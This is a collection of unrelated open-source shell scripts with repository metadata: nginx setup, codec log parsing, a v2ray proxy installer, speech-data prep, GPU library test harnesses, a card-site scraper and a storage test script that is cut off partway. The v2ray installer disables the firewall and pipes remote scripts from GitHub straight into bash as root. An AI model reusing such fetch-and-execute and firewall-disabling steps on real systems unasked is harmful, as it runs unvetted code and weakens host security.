apt-get -y install nginx
ufw allow 'Nginx HTTP'
echo "Holberton School says hello :)" | sudo tee /var/www/html/index.nginx-debian.html
sed -i '/listen 80 default_server;/a rewrite ^/redirect_me https://www.youtube.com/watch?v=QH2-TGUlwu4 permanent;' /etc/nginx/sites-available/default
echo "Ceci n'est pas une page" | sudo tee /usr/share/nginx/html/404-custom.html
sed -i '/server_name _;/a error_page 404 /404-custom.html;\nlocation = /404-custom.html {\n root /usr/share/nginx/html;\n internal;\n}\n' /etc/nginx/sites-available/default
service nginx start
| true
|
6d39466d3c6935430c1ce9b53594a8b3acc41c32
|
Shell
|
cisco/openh264
|
/autotest/performanceTest/parsePerfData.sh
|
UTF-8
| 3,073
| 3.609375
| 4
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
#usage runGetPerformanceInfo ${PerformanceLogFile}
runGetPerformanceInfo_openh264()
{
if [ ! $# -eq 2 ]
then
echo "not enough parameters!"
echo "usage: ${0} [android/ios] ${PerformanceLogFile}"
return 1
fi
local PerformanceLogFile=$2
local FileName=""
local Width=""
local Height=""
local Frames=""
local FPS=""
local EncodeTime=""
if [ $1 = "android" ]
then seperatorNum=3
else
seperatorNum=2
fi
while read line
do
if [[ $line =~ "enc yuv file" ]]
then
FileName=`echo $line | awk 'BEGIN {FS="enc yuv file"} {print $2}'`
FileName=`echo $FileName | awk 'BEGIN {FS=":"} {print $2}'`
fi
if [[ $line =~ "Width" ]]
then
Width=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "Height" ]]
then
Height=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "Frames" ]]
then
Frames=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "FPS" ]]
then
FPS=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
FPS=`echo $FPS | awk 'BEGIN {FS="fps"} {print $1}'`
echo "${FileName},"${Width}x${Height}",${Frames},${FPS}"
fi
if [[ $line =~ "encode time" ]]
then
EncodeTime=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "height" ]]
then
Height=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
fi
if [[ $line =~ "H264 source file name" ]]
then
FileName=`echo $line | awk 'BEGIN {FS=":"} {print $'${seperatorNum}'}'`
if [ $1 = "ios" ]
then
FileName=`echo $FileName | awk -F"DecoderPerfTestRes" '{print $2}'`
FileName=`echo $FileName | awk -F"/" '{print $2}'`
else
FileName=`echo $FileName | awk -F"/" '{print $4}'`
fi
fi
done <${PerformanceLogFile}
}
AUTO_TEST_RESULT_PATH="./TestResultCSV/"
parseLogToCSV()
{
if [ $# -ne 1 ]
then echo "Please input $0 [android/ios]"
fi
if [ $* = "android" ]
then
Result_log_path="./android/report/"
suffix=android
dos2unix ${Result_log_path}*.*
else
Result_log_path="./ios/report/"
suffix=ios
fi
Result_log=`ls ${Result_log_path}`
for log in ${Result_log}
do
PerformFile=`echo $log |awk -F"." '{print $1}'`
PerformFile=${PerformFile}_${suffix}.csv
#inital perfermance file
echo "$log,,,">>${AUTO_TEST_RESULT_PATH}${PerformFile}
echo "YUV,Resolution,Encodedframes,FPS">>${AUTO_TEST_RESULT_PATH}${PerformFile}
runGetPerformanceInfo_openh264 ${suffix} ${Result_log_path}${log}>>${AUTO_TEST_RESULT_PATH}${PerformFile}
done
}
parseLogToCSV android
parseLogToCSV ios
| true
|
6c14dc3922921e6d87d27bf059d16e10cf71a783
|
Shell
|
qingfenghuohu/os_init
|
/v2ray.sh
|
UTF-8
| 1,321
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
/bin/systemctl stop firewalld
/bin/systemctl disable firewalld
file = /usr/bin/v2ray/v2ray
if [ ! -f "$file" ]; then
yum -y install ntpdate crontab wget
/bin/systemctl restart crond.service
/bin/systemctl enable crond.service
timedatectl set-timezone Asia/Shanghai
ntpdate -u pool.ntp.org
curl https://raw.githubusercontent.com/qingfenghuohu/os_init/master/install-v2ray.sh | bash
curl https://raw.githubusercontent.com/v2fly/fhs-install-v2ray/master/install-dat-release.sh | bash
rm -f /etc/systemd/system/v2ray.service
rm -f /etc/v2ray/config.json
wget -P /etc/systemd/system/ https://raw.githubusercontent.com/qingfenghuohu/os_init/master/v2ray.service
wget -P /etc/v2ray/ https://raw.githubusercontent.com/qingfenghuohu/os_init/master/config.json
systemctl daemon-reload
/bin/systemctl enable v2ray
/bin/systemctl restart v2ray
echo "*/20 * * * * /usr/sbin/ntpdate pool.ntp.org > /dev/null 2>&1" >>/var/spool/cron/root
echo "1,10 * * * * /bin/systemctl restart v2ray > /dev/null 2>&1" >>/var/spool/cron/root
echo "v2ray install success"
fi
bbr=$(lsmod | grep bbr | awk '{print $1}')
if [[ "tcp_bbr" != $bbr ]]; then
curl -L -s https://raw.githubusercontent.com/qingfenghuohu/os_init/master/bbr.sh | bash
reboot
echo "bbr install success"
fi
| true
|
78f86f9142d59b1866f5d99aa7b606a8bcc79394
|
Shell
|
cmward/atc
|
/scripts/data_prep.sh
|
UTF-8
| 2,297
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash
## To be run from the project directory.
# Usage:
# sh data_prep <ufa-dir> <ufa-audio-dir> <atcosim-dir> <atcosim-audio-dir> /
# <broadcast-dir> <broadcast-transcript-dir> <partition-path> <data-path>
# For example:
# sh data_prep.sh corpora/UFA_DE corpora/UFA_DE/audio_fixed corpora/ATCOSIM /
# corpora/broadcast corpora/broadcast/hub4_eng_train_trans data_partitioning data
#
### Set up sorting.
export LANG=C; export LC_ALL=C
ufa=$1
ufa_audio=$2
atcosim=$3
atcosim_audio=$4
broadcast=$5
broadcast_trans=$6
partitions=$7
data_path=$8
python scripts/atc_text.py $ufa $atcosim $data_path
python scripts/atc_wavscp.py $ufa_audio $atcosim_audio $partitions $data_path
python scripts/atc_segments_and_reco.py $data_path
python scripts/atc_utt2spk.py $ufa $atcosim $data_path
python scripts/broadcast_kaldi_files.py $broadcast $broadcast_trans $data_path
# Combine the 'atc' and 'broadcast' directories into a 'train' directory.
atc_path=$data_path/atc
broadcast_path=$data_path/broadcast
train_path=$data_path/train
mkdir -p $train_path
cat $atc_path/text $broadcast_path/text | sort -u > $train_path/text
cat $atc_path/segments $broadcast_path/segments | sort -u > $train_path/segments
cat $atc_path/wav.scp $broadcast_path/wav.scp | sort -u > $train_path/wav.scp
cat $atc_path/reco2file_and_channel $broadcast_path/reco2file_and_channel | sort -u > $train_path/reco2file_and_channel
cat $atc_path/utt2spk $broadcast_path/utt2spk | sort -u > $train_path/utt2spk
# Sort the files of the 'test' directory.
test_path=$data_path/test
for f in text segments wav.scp reco2file_and_channel utt2spk; do
sort $atc_path/$f -o $atc_path/$f
sort $broadcast_path/$f -o $broadcast_path/$f
sort $test_path/$f -o $test_path/$f
done
# Generate the spk2utt files.
utils/utt2spk_to_spk2utt.pl $atc_path/utt2spk > $atc_path/spk2utt
utils/utt2spk_to_spk2utt.pl $broadcast_path/utt2spk > $broadcast_path/spk2utt
utils/utt2spk_to_spk2utt.pl $train_path/utt2spk > $train_path/spk2utt
utils/utt2spk_to_spk2utt.pl $test_path/utt2spk > $test_path/spk2utt
# Ensures segments are present in all files.
bash utils/fix_data_dir.sh $atc_path
bash utils/fix_data_dir.sh $broadcast_path
bash utils/fix_data_dir.sh $train_path
bash utils/fix_data_dir.sh $test_path
echo ATC data preparation succeeded.
| true
|
2732f9f26b15d92249c17ab02dabfe3decda0337
|
Shell
|
NVIDIA/DALI
|
/qa/test_template_impl.sh
|
UTF-8
| 8,921
| 3.40625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Force error checking
set -e
# Force tests to be verbose
set -x
# make python output unbuffered to get more accurate timestamps
export PYTHONUNBUFFERED=1
topdir=$(cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )/..
source $topdir/qa/setup_test_common.sh
# Set runner for python tests
export PYTHONPATH=${PYTHONPATH}:$topdir/qa
python_test_runner_package="nose nose2 nose-timer nose2-test-timer"
# use DALI nose wrapper to patch nose to support Python 3.10
python_test_runner="python -m nose_wrapper"
python_test_args="--verbose --with-timer --timer-top-n 20 -s"
python_invoke_test="${python_test_runner} ${python_test_args}"
# New framework for Python Tests
# During the transition we run both
# When all tests are ported old will be removed
python_new_test_runner="python -m nose2"
python_new_test_args="--verbose --plugin=nose2_test_timer.plugin --with-timer --timer-color --timer-top-n 20"
python_new_invoke_test="${python_new_test_runner} ${python_new_test_args}"
# Set proper CUDA version for packages, like MXNet, requiring it
pip_packages=$(eval "echo \"${pip_packages}\"" | sed "s/##CUDA_VERSION##/${CUDA_VERSION}/")
last_config_index=$($topdir/qa/setup_packages.py -n -u $pip_packages --cuda ${CUDA_VERSION})
install_pip_pkg() {
install_cmd="$@"
# if no package was found in our download dir, so install it from index
${install_cmd} --no-index || ${install_cmd}
}
if [ -n "$gather_pip_packages" ]
then
# early exit
return 0
fi
source $topdir/qa/setup_dali_extra.sh
target_dir=${target_dir-./}
cd ${target_dir}
# Limit to only one configuration (First version of each package)
if [[ $one_config_only = true ]]; then
echo "Limiting test run to one configuration of packages (first version of each)"
last_config_index=$(( 0 > $last_config_index ? $last_config_index : 0 ))
fi
# some global test setup
if [ "$(type -t do_once)" = 'function' ]; then
do_once
fi
prolog=${prolog-:}
epilog=${epilog-:}
# get the number of elements in `prolog` array
numer_of_prolog_elms=${#prolog[@]}
enable_sanitizer() {
# supress leaks that are false positive or not related to DALI
export LSAN_OPTIONS=suppressions=$topdir/qa/leak.sup
export ASAN_OPTIONS=symbolize=1:protect_shadow_gap=0:log_path=sanitizer.log:start_deactivated=true:allocator_may_return_null=1:detect_leaks=1:fast_unwind_on_malloc=0:verify_asan_link_order=0:detect_container_overflow=0
export ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer)
# avoid python false positives
export PYTHONMALLOC=malloc
# if something calls dlclose on a module that leaks and it happens before asan can extract symbols we get "unknown module"
# in the stack trace, to prevent this provide dlclose that does nothing
echo "int dlclose(void* a) { return 0; }" > /tmp/fake_dlclose.c && gcc -shared -o /tmp/libfakeclose.so /tmp/fake_dlclose.c
# for an unknown reason the more recent asan when we set PYTHONMALLOC=malloc, when captures the backtrace for
# the `new` call, calls malloc which is intercepted and backtrace is attempted to be captured
# however `_Unwind_Find_FDE` is not reentrant as it uses a mutex which leads to a deadlock
gcc -shared -fPIC $topdir/qa/test_wrapper_pre.c -o /tmp/pre.so
gcc -shared -fPIC $topdir/qa/test_wrapper_post.c -o /tmp/post.so
export OLD_LD_PRELOAD=${LD_PRELOAD}
export LD_PRELOAD="/tmp/pre.so /usr/lib/x86_64-linux-gnu/libasan.so /tmp/glibc_fix.so /tmp/post.so /usr/lib/x86_64-linux-gnu/libstdc++.so /tmp/libfakeclose.so"
}
# turn off sanitizer to avoid breaking any non-related system built-ins
disable_sanitizer() {
export ASAN_OPTIONS=start_deactivated=true:detect_leaks=0
export LD_PRELOAD=${OLD_LD_PRELOAD}
unset ASAN_SYMBOLIZER_PATH
unset PYTHONMALLOC
}
# Wrap the test_body in a subshell, where we can safely execute it with `set -e`
# and turn it off in current shell to intercept the error code
# when sanitizers are on, do set +e to run all the test no matter what the result is
# and collect as much of sanitizers output as possible
test_body_wrapper() {(
if [ -n "$DALI_ENABLE_SANITIZERS" ]; then
set +e
enable_sanitizer
else
set -e
fi
test_body
if [ -n "$DALI_ENABLE_SANITIZERS" ]; then
disable_sanitizer
fi
)}
process_sanitizers_logs() {
find $topdir -iname "sanitizer.log.*" -print0 | xargs -0 -I file cat file > $topdir/sanitizer.log
if [ -e $topdir/sanitizer.log ]; then
cat $topdir/sanitizer.log
grep -q ERROR $topdir/sanitizer.log && exit 1 || true
fi
find $topdir -iname "sanitizer.log*" -delete
}
# get extra index url for given packages - PEP 503 Python Package Index
extra_indices=$($topdir/qa/setup_packages.py -u $pip_packages --cuda ${CUDA_VERSION} -e)
extra_indices_string=""
for e in ${extra_indices}; do
extra_indices_string="${extra_indices_string} --extra-index-url=${e}"
done
# get link index url for given packages - a URL or path to an html file with links to archives
link_indices=$($topdir/qa/setup_packages.py -u $pip_packages --cuda ${CUDA_VERSION} -k)
link_indices_string=""
for e in ${link_indices}; do
link_indices_string="${link_indices_string} -f ${e}"
done
# store the original LD_LIBRARY_PATH
OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
for i in `seq 0 $last_config_index`;
do
echo "Test run $i"
# seq from 0 to number of elements in `prolog` array - 1
for variant in $(seq 0 $((${numer_of_prolog_elms}-1))); do
${prolog[variant]}
echo "Test variant run: $variant"
# install the latest cuda wheel for CUDA 11.x and above tests if it is x86_64
# or we just want to use CUDA from system, not wheels
version_ge "${CUDA_VERSION}" "110" && \
if [ "$(uname -m)" == "x86_64" ] && [ -z "${DO_NOT_INSTALL_CUDA_WHEEL}" ]; then
install_pip_pkg "pip install --upgrade nvidia-npp-cu${DALI_CUDA_MAJOR_VERSION} \
nvidia-nvjpeg-cu${DALI_CUDA_MAJOR_VERSION} \
nvidia-cufft-cu${DALI_CUDA_MAJOR_VERSION} \
-f /pip-packages"
fi
# install packages
inst=$($topdir/qa/setup_packages.py -i $i -u $pip_packages --cuda ${CUDA_VERSION})
if [ -n "$inst" ]; then
for pkg in ${inst}
do
install_pip_pkg "pip install $pkg -f /pip-packages ${link_indices_string} ${extra_indices_string}"
done
# If we just installed tensorflow, we need to reinstall DALI TF plugin
if [[ "$inst" == *tensorflow* ]]; then
# The package name can be nvidia-dali-tf-plugin, nvidia-dali-tf-plugin-weekly or nvidia-dali-tf-plugin-nightly
# Different DALI can be installed as a dependency of nvidia-dali so uninstall it too
pip uninstall -y `pip list | grep nvidia-dali-tf-plugin | cut -d " " -f1` || true
pip uninstall -y `pip list | grep nvidia-dali | cut -d " " -f1` || true
pip install /opt/dali/nvidia_dali*.whl
pip install /opt/dali/nvidia-dali-tf-plugin*.tar.gz
fi
# if we are using any cuda or nvidia-tensorflow wheels (nvidia-npp, nvidia-nvjpeg or nvidia-cufft)
# unset LD_LIBRARY_PATH to not used cuda from /usr/local/ but from wheels
# however avoid removing compat from the path
if [[ "$inst" == *nvidia-n* ]] || [[ "$inst" == *nvidia-c* ]] || [[ "$inst" == *nvidia-t* ]]; then
TAIL=${LD_LIBRARY_PATH#*compat}
LD_LIBRARY_PATH=${LD_LIBRARY_PATH/$TAIL/}
export LD_LIBRARY_PATH=${LD_LIBRARY_PATH##*:}
fi
fi
# test code
# Run test_body in subshell, the exit on error is turned off in current shell,
# but it will be present in subshell (thanks to wrapper).
# We can intercept first error that happens. test_body_wrapper cannot be used with
# any conditional as it will turn on "exit on error" behaviour
set +e
test_body_wrapper
RV=$?
set -e
if [ -n "$DALI_ENABLE_SANITIZERS" ]; then
process_sanitizers_logs
fi
# restore the original LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
if [ $RV -gt 0 ]; then
# if sanitizers are enabled don't capture core
if [ -z "$DALI_ENABLE_SANITIZERS" ]; then
mkdir -p $topdir/core_artifacts
cp core* $topdir/core_artifacts || true
fi
exit ${RV}
fi
# remove packages
remove=$($topdir/qa/setup_packages.py -r -u $pip_packages --cuda ${CUDA_VERSION})
if [ -n "$remove" ]; then
pip uninstall -y $remove
fi
${epilog[variant]}
done
done
| true
|
b8f9cd7965702e268b39f14a53d919ae9043ae9d
|
Shell
|
kissthink/ports
|
/libs_toolkit/gtk_engine_unico/gtk_engine_unico.build
|
UTF-8
| 1,707
| 3.125
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Maintainer: Christoph J. Thompson <cjsthompson@gmail.com>
source /usr/src/ports/Build/build.sh
NAME=gtk_engine_unico
MAJOR=1.0
VERSION=${MAJOR}.2
BUILD=2
DEPENDS=('gtk+ >= 3.8.0-1')
# Description
cat > ${PKG}/install/slack-desc <<EOF
# HOW TO EDIT THIS FILE:
# The "handy ruler" below makes it easier to edit a package description. Line
# up the first '|' above the ':' following the base package name, and the '|'
# on the right side marks the last column you can put a character in. You must
# make exactly 11 lines for the formatting to be correct. It's also
# customary to leave one space after the ':'.
$(padd)|-----handy-ruler------------------------------------------------------|
${NAME}: unico
${NAME}:
${NAME}: A gtk+ theme engine that aims to be the most complete and powerful
${NAME}: theming engine. It is written with the gtk+ style context APIs in
${NAME}: mind, using CSS as a first class citizen.
${NAME}:
${NAME}: Homepage: http://launchpad.net/unico
${NAME}:
${NAME}:
${NAME}:
${NAME}:
EOF
# Sources
SRCNAME[0]=unico
SRCVERS[0]=${VERSION}
SRCPACK[0]=https://launchpad.net/${SRCNAME[0]}/${MAJOR}/${SRCVERS[0]}/+download/${SRCNAME[0]}-${SRCVERS[0]}.tar.gz
SRCCOPY[0]="LGPL21"
build0()
{
sed -i 's|$(libdir)/gtk-3.0|$(libdir)/plugins/gtk-3.0|g' unico/Makefile.{am,in}
CFLAGS="${FLAGS}" CXXFLAGS="${FLAGS}" \
./configure \
--build="${ARCH}-slackware-linux" \
--disable-dependency-tracking \
--disable-silent-rules \
--enable-static=no \
--enable-shared=yes \
--prefix="${SYS_DIR[usr]}" \
--mandir="${SYS_DIR[man]}" \
--sysconfdir="${SYS_DIR[etc]}" \
--libdir="${SYS_DIR[lib]}" \
--localstatedir="${SYS_DIR[var]}"
make ${JOBS}
make install DESTDIR="${PKG}"
doc AUTHORS
changelog NEWS
}
| true
|
e285c04c95ba413799d1bccd336bb734ba6ad797
|
Shell
|
zhao-lin-li/django_with_containers
|
/bootstrap.sh
|
UTF-8
| 563
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/sh
# This script bootstraps the application
set -e
### define functions
SRC_DIR=$(cd "$(dirname "$0")"; pwd -P)
. "$SRC_DIR"/scripts/bootstrap/functions.sh
set_defaults() {
ENV=development
}
gather_options() {
while getopts "e:" OPT; do
case $OPT in
e)
ENV=$OPTARG
;;
esac
done
}
### define functions:end
set_defaults
gather_options "$@"
case $ENV in
'development')
echo "Clearing out old containers"
teardown_containers "$ENV"
echo "Setting up $ENV containers"
setup_containers "$ENV"
;;
esac
| true
|
c6ee65ebbb815d8bae9ec866da6f9113d44354cc
|
Shell
|
danives/FFTCGDB
|
/bin/update_cards.sh
|
UTF-8
| 7,706
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash -e
### Setting default values.
# URL - the target to query for scraping cards out of
url="http://fftcgdb.com/card"
# Stop - what message to search for that would signify we've asked for a non-existant card
stop="Whoops! You found an error."
# Sets - What sets (Opuses) of cards we want to retrieve.
sets=("1" "2" "3" "pr")
# Type - 'clean' is drop all table contents and make from scratch; 'sync' is just update existing cards in the table.
type="$(echo "$1" | awk '{print tolower($0)}')"
###
# Default to the less destructive option
if [ "$type" != "clean" ]; then
type="sync"
fi
# Housekeeping
if [[ -f 'cards.sql' ]]; then
rm 'cards.sql'
fi
# Purge all old Card table entries, thus replacing them with our new ones. Only do this if we're cleaning
if [[ "$type" == "clean" ]]; then
echo "delete from cards;" > cards.sql
echo "ALTER TABLE cards AUTO_INCREMENT = 1;" >> cards.sql
fi
# Header for our imminent dump of card data to stdout.
printf '%-30s%-20s%-20s%-20s%-30s%-20s%-20s%-20s%-20s\n' "NAME" "ELEMENT" "COST" "TYPE" "JOB" "CATEGORY" "POWER" "RARITY" "NUMBER"
for s in "${sets[@]}"; do
# More housekeeping
if [[ -f '.cache' ]]; then
rm '.cache'
fi
touch .cache
i="1"
# "So long as we haven't seen the 'stop' trigger..."
while [[ "$(grep "$stop" .cache)" == "" ]]; do
curl "$url/$s-$i" 2>/dev/null > .cache
# Display what cards we've found, and the information we parsed for each card. Allows for review prior to implementation.
card_name="$(grep "<h4>" .cache | sed -e 's/.*<h4>//g' -e "s/'/'/g")"
card_elem="$(grep ".png\" /> (" .cache | sed -e 's/.*(//g' -e 's/).*//g')"
card_type="$(grep -A 1 ">Type<" .cache | grep -v ">Type<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g')"
card_cost="$(grep -A 1 ">Cost<" .cache | grep -v ">Cost<" | sed -e 's/.*none;">//g' -e 's/<\/td>.*//g')"
card_job="$(grep -A 1 ">Job<" .cache | grep -v ">Job<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g' -e "s/'/'/g")"
card_cat="$(grep -A 1 ">Category<" .cache | grep -v ">Category<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g')"
card_pwr="$(grep -A 1 ">Power<" .cache | grep -v ">Power<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g')"
card_num="$(grep -A 1 ">Card Number<" .cache | grep -v ">Card Number<" | sed -e 's/.*<td>//g' -e 's/<\/td>.*//g')"
card_rare="$(echo $card_num | sed -e 's/.*-//g')"
card_text="$(grep -A 1 ">Card Text<" .cache | grep -v ">Card Text<" | sed -e 's/.*<td><p>//g' -e 's/<\/p><\/td>.*//g' -e "s/'/'/g")"
if [[ "$(grep "$stop" .cache)" == "" ]]; then
printf '%-30s%-20s%-20s%-20s%-30s%-20s%-20s%-20s%-20s\n' "$card_name" "$card_elem" "$card_cost" "$card_type" "$card_job" "$card_cat" "$card_pwr" "$card_rare" "$card_num"
fi
# The database wants an integer for card_power, so ensure it gets one.
if [[ "$card_cost" == "" ]]; then
card_cost="0"
fi
# Replace tags with markup in text we pulled to keep things clean
card_text="$(echo "$card_text" | sed -e 's|<img class="small-icon" src="/img/icons/special.png" />|[s]|g' \
-e 's|<img class="small-icon" src="/img/icons/dull.png" />|[dull]|g' \
-e 's|<img class="small-icon" src="/img/icons/fire.png" />|[fire]|g' \
-e 's|<img class="small-icon" src="/img/icons/ice.png" />|[ice]|g' \
-e 's|<img class="small-icon" src="/img/icons/air.png" />|[air]|g' \
-e 's|<img class="small-icon" src="/img/icons/earth.png" />|[earth]|g' \
-e 's|<img class="small-icon" src="/img/icons/lightning.png" />|[lightning]|g' \
-e 's|<img class="small-icon" src="/img/icons/water.png" />|[water]|g' \
-e 's|<span class="fa-stack fa-1x"><i class="fa fa-circle-thin fa-stack-1x"></i><span class="fa-stack-1x">1</span></span>|[1]|g' \
-e 's|<span class="fa-stack fa-1x"><i class="fa fa-circle-thin fa-stack-1x"></i><span class="fa-stack-1x">2</span></span>|[2]|g' \
-e 's|<span class="fa-stack fa-1x"><i class="fa fa-circle-thin fa-stack-1x"></i><span class="fa-stack-1x">3</span></span>|[3]|g' \
-e 's|<b>||g' \
-e 's|</b>||g')"
# Make sure we don't mistake an error page for a card when making database entries
if [[ "$(grep "$stop" .cache)" == "" ]]; then
if [[ "$type" == "clean" ]]; then
if echo "$card_type" | grep -qi "forward"; then
# This is a conditional insert - it will only insert the card if one with the same set number and card number is not found in the database.
printf "INSERT INTO cards ( set_number, name, cost, element, type, job, category, text, card_number, rarity, power, created_at, updated_at ) select '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', NOW(), NOW() from DUAL where not exists ( select id from cards where TRIM(LEADING '0' FROM card_number) = '%s' and set_number = '%s' limit 1 );\n" "$s" "$(echo $card_name | sed -e "s/'/\\\'/g")" "$card_cost" "$(echo "$card_elem" | awk '{print tolower($0)}')" "$(echo "$card_type" | awk '{print tolower($0)}')" "$(echo $card_job | sed -e "s/'/\\\'/g")" "$card_cat" "$(echo $card_text | sed -e "s/'/\\\'/g")" "$i" "$card_rare" "$card_pwr" "$i" "$s" >> cards.sql
else
# If the card we retrieved is not a forward, omit the 'power' value. Otherwise SQL will complain we aren't providing an integer.
printf "INSERT INTO cards ( set_number, name, cost, element, type, job, category, text, card_number, rarity, created_at, updated_at ) select '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', NOW(), NOW() from DUAL where not exists ( select id from cards where TRIM(LEADING '0' FROM card_number) = '%s' and set_number = '%s' limit 1 );\n" "$s" "$(echo $card_name | sed -e "s/'/\\\'/g")" "$card_cost" "$(echo "$card_elem" | awk '{print tolower($0)}')" "$(echo "$card_type" | awk '{print tolower($0)}')" "$(echo $card_job | sed -e "s/'/\\\'/g")" "$card_cat" "$(echo $card_text | sed -e "s/'/\\\'/g")" "$i" "$card_rare" "$i" "$s" >> cards.sql
fi
else
if echo "$card_type" | grep -qi "forward"; then
printf "UPDATE cards SET name = '%s', cost = '%s', element = '%s', type = '%s', job = '%s', category = '%s', text = '%s', rarity = '%s', power ='%s', updated_at = NOW() where set_number = '%s' and TRIM(LEADING '0' FROM card_number) = '%s' limit 1;\n" "$(echo $card_name | sed -e "s/'/\\\'/g")" "$card_cost" "$(echo "$card_elem" | awk '{print tolower($0)}')" "$(echo "$card_type" | awk '{print tolower($0)}')" "$(echo $card_job | sed -e "s/'/\\\'/g")" "$card_cat" "$(echo $card_text | sed -e "s/'/\\\'/g")" "$card_rare" "$card_pwr" "$s" "$i" >> cards.sql
else
printf "UPDATE cards SET name = '%s', cost = '%s', element = '%s', type = '%s', job = '%s', category = '%s', text = '%s', rarity = '%s', updated_at = NOW() where set_number = '%s' and TRIM(LEADING '0' FROM card_number) = '%s' limit 1;\n" "$(echo $card_name | sed -e "s/'/\\\'/g")" "$card_cost" "$(echo "$card_elem" | awk '{print tolower($0)}')" "$(echo "$card_type" | awk '{print tolower($0)}')" "$(echo $card_job | sed -e "s/'/\\\'/g")" "$card_cat" "$(echo $card_text | sed -e "s/'/\\\'/g")" "$card_rare" "$s" "$i" >> cards.sql
fi
fi
fi
i="$((i+1))"
done
done
# more housekeeping
if [[ -f '.cache' ]]; then
rm '.cache'
fi
exit 0
| true
|
bce56a88b533266fd6ad2004c57e27d70c38a0d8
|
Shell
|
south-potato/poseidonos
|
/test/script/wbtTestScript.sh
|
UTF-8
| 19,026
| 3.40625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
#Run it from root ibof directory
#eg bash ./script/wbtTestScript.sh
#cd $(dirname $0)
scriptPath=$(pwd)
echo "In Directory " $scriptPath
ROOT_DIR=$(readlink -f $(dirname $0))/../..
#Relative_Path_root="../.."
BIN_DIR=${ROOT_DIR}/bin
VM_IP_RANGE_1="10.1.11."
VM_IP_RANGE_2="10.100.11."
ARRAYNAME=POSArray
#####################################################################
fileSize1=4096
fileSize2=4096
fileName1="testFile1"
fileName2="testFile2"
fileOffset1=0
fileOffset2=0
#Dont put special chars in data Cause its going though Json parser.
#TODO: Find another way to send data to API
fileData1="sdfsfsdfsdfsdfsdfsdfsdfsdfsdfsfsdfsd.....ABCDEFGHIJKLMNOPQRSTUVWXYZ09876543211234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
fileData2="sdslkhspweoncmspwenajhdfvglqelkhsdsfisdkfjasdkfsdjghwgjwdsfsalghsgsoisligpiuoiuysalgytity53493534538r937085q34850802949wfhgjwl19035820r82wjhwejrhwkhfksdfhksdfsdfsadf"
dataLength1=$(expr ${#fileData1} + ${#fileData2})
dataLength2=$(expr ${#fileData1} + ${#fileData2})
#:TODO Need to get fileDesc from MFS util, but for now using this HARDCODED
fileDesc1=3
fileDesc2=4
inputFile="${scriptPath}/../wbtWriteBufferFile"
cliOutput="${scriptPath}/../wbtCliOutput.txt"
InodeOutput="${scriptPath}/../inodeInfo.json"
FilesInfoOutput="${scriptPath}/../filesInfo.json"
InodeInput="${scriptPath}/../inodeInfo.json"
echo "Input Buffer File " $inputFile
echo "Cli Output file " $cliOutput
#####################################################################
#read -p "Want to MountArray?. Enter y or n:" runMountArray
echo "Input in file.\n"
touch $inputFile
echo -n "$fileData1" >> $inputFile
echo -n "$fileData2" >> $inputFile
cwd="/home/ibof/ibofos/"
exec_mode=0
touch $cliOutput
nss="nqn.2019-04.pos:subsystem1"
transport=tcp
target_ip=10.1.11.254
target_fabric_ip=10.100.11.254
target_port=1158
ip="10.100.11.28"
test_iteration=2000
totalsize=100 #pm : 12500
volcnt=4
test_time=3600
cpusallowed="10-11"
# array mode [normal, degraded]
arraymode="normal"
# shutdown type [none, spor, npor]
shutdowntype="none"
# rebuild mode [none, rebuild_before_gc, rebuild_after_gc]
rebuild="none"
exit_result=0
print_result()
{
local result=$1
local expectedResult=$2
if [ $expectedResult -eq 0 ]; then
echo -e "\033[1;34m${date} [result] ${result} \033[0m" 1>&2;
else
echo -e "\033[1;41m${date} [TC failed] ${result} \033[0m" 1>&2;
exit_result=1
fi
}
check_result()
{
#local result=$1
#local expectedResult=$2
cat ${cliOutput} | jq ".Response.result.status.code" > result.txt
result=$(<result.txt)
if [ ${result} -ne 0 ]; then
print_result "there is a problem" 1
else
print_result "CMD is working" 0
fi
}
check_result_expected_fail()
{
#local result=$1
#local expectedResult=$2
cat ${cliOutput} | jq ".Response.result.status.code" > result.txt
result=$(<result.txt)
if [ ${result} -ne 0 ]; then
print_result "CMD is working" 0
else
print_result "there is a problem" 1
fi
}
pause()
{
echo "Press any key to continue.."
read -rsn1
}
while getopts "f:t:i:s:c:p:a:r:" opt
do
case "$opt" in
f) ip="$OPTARG"
;;
t) test_time="$OPTARG"
;;
i) test_iteration="$OPTARG"
;;
s) totalsize="$OPTARG"
;;
c) cpusallowed="$OPTARG"
;;
p) shutdowntype="$OPTARG"
;;
a) arraymode="$OPTARG"
;;
r) rebuild="$OPTARG"
esac
done
echo "------------[Kill & Start poseidonos]----------------------------------"
sudo ${ROOT_DIR}/test/script/kill_poseidonos.sh
sudo ${ROOT_DIR}/script/start_poseidonos.sh
sleep 10
echo ------------[setup poseidonos]-------------------------------------------
